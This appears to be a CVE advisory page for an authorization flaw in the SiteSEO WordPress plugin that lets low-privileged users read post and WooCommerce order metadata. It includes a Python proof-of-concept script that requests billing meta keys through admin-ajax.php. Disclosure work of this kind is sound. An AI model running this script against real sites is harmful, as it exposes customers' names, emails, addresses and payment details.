Security Vulnerability Report
CVE-2025-13085 CVSS 4.3 MEDIUM

CVE-2025-13085

Published: 2025-11-19 07:15:50
Last Modified: 2026-04-15 00:35:42

Description

The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to Improper Authorization leading to Sensitive Post Meta Disclosure in versions up to and including 1.3.2. This is due to missing object-level authorization checks in the resolve_variables() AJAX handler. This makes it possible for authenticated attackers with the siteseo_manage capability (e.g., Author-level users who have been granted SiteSEO access by an administrator) to read arbitrary post metadata from any post, page, attachment, or WooCommerce order they cannot edit, via the custom field variable resolution feature, provided that they have been given access to SiteSEO by an administrator and legacy storage is enabled. In affected WooCommerce installations, this exposes sensitive customer billing information including names, email addresses, phone numbers, physical addresses, and payment methods.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SiteSEO – SEO Simplified WordPress plugin <= 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13085 PoC - SiteSEO Unauthorized Metadata Disclosure
# Target: WordPress site with SiteSEO plugin <= 1.3.2


def exploit_siteseo_cve_2025_13085(target_url, wp_admin_cookie):
    """
    Exploit for SiteSEO improper authorization vulnerability
    Allows authenticated users with siteseo_manage capability to read arbitrary post metadata
    """
    # Target endpoint for AJAX request
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Prepare payload to read arbitrary post metadata
    # This exploits the resolve_variables() function lacking authorization checks
    payload = {
        'action': 'siteseo_pro_resolution',
        'post_id': 'TARGET_POST_ID',  # Target post/order ID to read metadata from
        'variable': 'meta_key_to_exploit',  # e.g., _billing_email, _billing_phone, etc.
        'post_type': 'post'  # or 'shop_order' for WooCommerce
    }

    headers = {
        'Cookie': wp_admin_cookie,
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    try:
        response = requests.post(ajax_url, data=payload, headers=headers, timeout=30)
        if response.status_code == 200:
            print(f"[+] Request successful - Metadata disclosure possible")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-13085.py <target_url> <wp_admin_cookie>")
        print("Example: python cve-2025-13085.py http://example.com 'wordpress_logged_in_xxx=xxx'")
        sys.exit(1)

    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_siteseo_cve_2025_13085(target, cookie)
```

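References

https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/admin.php#L106
https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/ajax.php#L542
https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/titlesmetas.php#L494
https://plugins.trac.wordpress.org/changeset/3397272/siteseo/trunk?contextall=1&old=3387094&old_path=%2Fsiteseo%2Ftrunk
https://www.wordfence.com/threat-intel/vulnerabilities/id/4d740ba8-4877-4b27-a1cb-26095f851ea6?source=cve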

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13085", "sourceIdentifier": "[email protected]", "published": "2025-11-19T07:15:50.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to Improper Authorization leading to Sensitive Post Meta Disclosure in versions up to and including 1.3.2. This is due to missing object-level authorization checks in the resolve_variables() AJAX handler. This makes it possible for authenticated attackers with the siteseo_manage capability (e.g., Author-level users who have been granted SiteSEO access by an administrator) to read arbitrary post metadata from any post, page, attachment, or WooCommerce order they cannot edit, via the custom field variable resolution feature granted they have been given access to SiteSEO by an administrator and legacy storage is enabled. In affected WooCommerce installations, this exposes sensitive customer billing information including names, email addresses, phone numbers, physical addresses, and payment methods."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/admin.php#L106", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/ajax.php#L542", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/titlesmetas.php#L494", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3397272/siteseo/trunk?contextall=1&old=3387094&old_path=%2Fsiteseo%2Ftrunk", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d740ba8-4877-4b27-a1cb-26095f851ea6?source=cve", "source": "[email protected]"}]}}